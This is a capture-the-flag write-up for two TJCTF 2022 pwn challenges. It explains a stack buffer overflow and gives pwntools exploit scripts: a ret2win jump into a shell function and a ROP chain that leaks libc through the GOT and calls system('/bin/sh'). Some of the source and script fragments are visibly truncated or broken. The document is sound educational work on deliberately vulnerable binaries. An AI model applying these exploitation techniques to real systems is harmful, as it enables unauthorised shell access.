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TJCTF 2022: pwn/vacation-1 and pwn/vacation-2

Participant: Robert Obkircher

TL;DR / Short Summary

In the challenge pwn/vacation-1 there is an obvious buffer overflow that can be used to return into a function shell_land which calls system("/bin/sh").

The second challenge pwn/vacation-2 is almost identical, but without shell_land. The solution is to use return oriented programming to leak the address of libc and call system("/bin/sh").

Task Description

The task descriptions were very minimal. The files are in this repo.

pwn/vacation1: 162 solves / 175 points

Too much school, too much work, too much writing CTF challenges... can I just go on vacation?

nc 31680

Downloads: Dockerfile, chall, chall.c

pwn/vacation2: 86 solves / 233 points

Travel agency said we can't go there anymore...

nc 31705

Downloads: Dockerfile, chall, chall.c

Analysis Steps


The Dockerfile is identical for both challenges:

FROM redpwn/jail:0.1.3

# ubuntu:focal-20220404
COPY --from=ubuntu@sha256:31cd7bbfd36421dfd338bceb36d803b3663c1bfa87dfe6af7ba764b5bf34de05 / /srv

# create bin/flag.txt with whatever inside
COPY bin/flag.txt /srv/app/
COPY bin/chall /srv/app/run

I couldn't run it so I created a docker container with the same version of ubuntu

docker run --rm -it -v$PWD:/foo ubuntu:focal-20220404

and some dependencies:

apt-get update
apt-get install vim gdb tmux python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade pwntools

For pwn/vacation2 it was also necessary to have a copy of libc. Initially I used the wrong file /lib/ when I should have used /srv/lib/x86_64-linux-gnu/ The script vacation2/ can be used to get a copy of the file system:

docker build -t vacation2 .

rm -rf docker && mkdir docker && cd docker

C=$(docker container create vacation2:latest)
docker export -o x.tar $C
docker container rm $C

tar -xf x.tar && rm x.tar

Source code

The only difference in the c files was that shell_land wasn't included for pwn/vacation2.

The function vacation contains a buffer overflow. The call to fgets(buf, 64, stdin) writes up to 64 bytes into the 16 byte buffer buf.

#include <stdio.h>
#include <stdlib.h>

void shell_land() {

void vacation() {
  char buf[16];
  puts("Where am I going today?");
  fgets(buf, 64, stdin);

void main() {
  setbuf(stdout, NULL);
  puts("hmm... that doesn't sound very interesting...");


pwntools prints the same information for both binaries. Note that canaries are disabled and that the code is not position independent (No PIE).

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)


I used cutter to decompile the binaries. The relevant functions are shell_land and vacation.

The buffer overflow in vacation, which is explained below, allows us to set the return address to 0x0040119e inside shell_land.

Initially I returend to 0x00401196, but then the exploit only worked locally. The reason was a segmentation fault, because rsp was not aligned to 16 bytes at function entry as specified by the System V ABI. Skipping push rbp in shell_land resolved the issue.

shell_land ();
0x00401196      endbr64
0x0040119a      push rbp
0x0040119b      mov rbp, rsp
0x0040119e      lea rdi, str.bin_sh ; 0x402008 ; const char *string
0x004011a5      call system        ; sym.imp.system ; int system(const char *string)
0x004011aa      nop
0x004011ab      pop rbp
0x004011ac      ret
vacation ();
; var char *s @ rbp-0x10
0x004011ad      endbr64
0x004011b1      push rbp
0x004011b2      mov rbp, rsp
0x004011b5      sub rsp, 0x10
0x004011b9      lea rdi, str.Where_am_I_going_today ; 0x402010 ; const char *s
0x004011c0      call section..plt.sec ; sym.imp.puts ; int puts(const char *s)
0x004011c5      mov rdx, qword [stdin] ; obj.stdin__GLIBC_2.2.5
                                   ; 0x404060 ; FILE *stream
0x004011cc      lea rax, [s]
0x004011d0      mov esi, 0x40      ; '@' ; 64 ; int size
0x004011d5      mov rdi, rax       ; char *s
0x004011d8      call fgets         ; sym.imp.fgets ; char *fgets(char *s, int size, FILE *stream)
0x004011dd      nop
0x004011de      leave
0x004011df      ret


In this case we don't have shell_land, so main becomes relevant, because it gives us two primitives for return oriented programming:

  1. The call to int puts(const char *s) at 0x004011d6 can be used to read memory. The first argument const char *s is passed in the rdi register as specified by the System V ABI.
  2. Returning to the start of main is a simple way to create a loop that reads and evaluates multiple payloads. This is necessary because the buffer can only fit ~5 return addresses.

The buffer overflow is the same as above, because vacation is identical except that it is located at a different offset.

vacation ();
; var char *s @ rbp-0x10
0x00401176      endbr64
0x0040117a      push    rbp
0x0040117b      mov     rbp, rsp
0x0040117e      sub     rsp, 0x10
0x00401182      lea     rdi, str.Where_am_I_going_today ; 0x402008 ; const char *s
0x00401189      call    section..plt.sec ; sym.imp.puts ; int puts(const char *s)
0x0040118e      mov     rdx, qword [stdin] ; obj.stdin__GLIBC_2.2.5
                                   ; 0x404050 ; FILE *stream
0x00401195      lea     rax, [s]
0x00401199      mov     esi, 0x40  ; '@' ; 64 ; int size
0x0040119e      mov     rdi, rax   ; char *s
0x004011a1      call    fgets      ; sym.imp.fgets ; char *fgets(char *s, int size, FILE *stream)
0x004011a6      nop
0x004011a7      leave
0x004011a8      ret
int main (int argc, char **argv, char **envp);
0x004011a9      endbr64
0x004011ad      push    rbp
0x004011ae      mov     rbp, rsp
0x004011b1      mov     rax, qword [stdout] ; obj.__TMC_END
                                   ; 0x404040
0x004011b8      mov     esi, 0     ; char *buf
0x004011bd      mov     rdi, rax   ; FILE *stream
0x004011c0      call    setbuf     ; sym.imp.setbuf ; void setbuf(FILE *stream, char *buf)
0x004011c5      mov     eax, 0
0x004011ca      call    vacation   ; sym.vacation
0x004011cf      lea     rdi, str.hmm..._that_doesn_t_sound_very_interesting... ; 0x402020 ; const char *s
0x004011d6      call    section..plt.sec ; sym.imp.puts ; int puts(const char *s)
0x004011db      nop
0x004011dc      pop     rbp
0x004011dd      ret
0x004011de      nop

Vulnerabilities / Exploitable Issue(s)

void vacation() {
  char buf[16];
  puts("Where am I going today?");
  fgets(buf, 64, stdin);

The vulnerability is that the function vacation contains a buffer overflow which allows us to overwrite the return address with data from stdin. When it is called the following changes are made to the stack:

instruction pushed value rsp change
call vacation return address -8
push rbp previous base pointer -8
sub rsp, 0x10 char buf[16] -16

The register rsp points to the top of the stack and its final value is the same as the start address of buf.

The stack grows toward smaller addresses but arrays indices grow toward larger addresses. Thus buf[16..24] is the previous base pointer and buf[24..32] is the return address.

The statement fgets(buf, 64, stdin); allows us to override the return address of the current stack frame. In addition, we can overwrite up to 4 additional return addresses (31 bytes and a 0) to chain multiple calls.



The following script opens the binary with pwntools, connects to the remote and sends one line to override the return address and another one with a shell command to read the flag.

from pwn import *

chall = ELF("bin/chall")
shell_land = chall.symbols["shell_land"]
assert shell_land == 0x00401196

# This is not required on my kali virtualbox vm.
# It is necessary on the remote and in a ubuntu:focal-20220404 docker container.
shell_land = 0x0040119e

with remote("", 31680) as p:
    rbp = 0x0
    buffer = b"x" * 16 + p64(rbp) + p64(shell_land) + b"\n"
    p.sendline(b"cat flag.txt")


The original script in vacation2/ contains more comments and debug print statements.

This helper function sends up to 64 bytes. It asserts that fgets will copy the full content into memory without modifications.

def send_one_line(p, line):
    assert b"\n" not in line, line
    # The program reads at most 63 chars and adds a 0 at the end
    if len(line) < 63:
    elif len(line) == 63:
    elif len(line) == 64:
        assert line[63] == 0, line
        assert False, line

Next, the function read_bytes_and_ret_to_main(pointer, length) can be used to read a byte array from memory.

It uses the helper function puts_addr_and_ret_to_main(addr) to construct the rop chain. First rop(rdi = p64(addr)) places a char pointer addr on the stack and some address with the instructions pop rdi; ret to load it into the register. Then we add 0x004011d6 and 0 to execute puts; pop rbp; ret at the end of main. Finally, we return to the beginning of main so that we can send another line.

Because puts stops at the null terminator we call it in a loop with different offsets until we have received at least the desired amount of bytes.

def puts_addr_and_ret_to_main(addr):
    chall = context.binary
    rop = ROP(chall)

    rop(rdi = p64(addr))

    rop.raw(p64(0)) # for pop rbp at the end of main

    return bytes(rop)

def read_bytes_and_ret_to_main(pointer, length):
    value = b""
    for i in range(length):
        if i == len(value):
            send_one_line(p, b"x" * (16 + 8) + puts_addr_and_ret_to_main(pointer + i))
            data = p.recvuntil(b"\nWhere am I going today?\n", drop=True)
            value += data
            value += b"\0"
    return value[0:length]

Now that we can read arbitrary memory we can read the address of the libc function puts from the global offset table at got.puts. This allows us to compute the address of libc, which is located at a random address because of address space layout randomization (ASLR).

After setting libc.address, pwntools automatically updates the location of all symbols. We can then simply put a pointer to the string "/bin/sh\x00" into rdi and return to system. To avoid segmentation faults we have to align the stack to 16 bytes by jumping directly to a ret instruction, which pops 8 bytes from the stack. For some reason this wasn't necessary in my local virtual machine.

context.binary = chall = ELF("bin/chall")

with remote("", 31705) as p:
    p.recvline() # Where am I going today?

    puts_ptr = u64(read_bytes_and_ret_to_main(chall.symbols["got.puts"], 8))

    libc = ELF("docker/srv/lib/x86_64-linux-gnu/")
    libc.address = puts_ptr - libc.symbols["puts"]
    assert libc.symbols["puts"] == puts_ptr

    rop = ROP(chall)
    rop(rdi = p64(next("/bin/sh\x00"))))
    rop.raw(rop.find_gadget(["ret"]).address) # required in ubuntu docker to align the stack
    send_one_line(p, b"x" * (16 + 8) + bytes(rop))

    p.sendline(b"cat flag.txt\n")
    print(p.recvall(timeout = 1))

Failed Attempts


Alternative Solutions

I haven't looked at alternative solutions.

Lessons Learned

This was the first time that I've used pwntools. The biggest lesson that I've learned was that stack alignment is more important than I've thought.
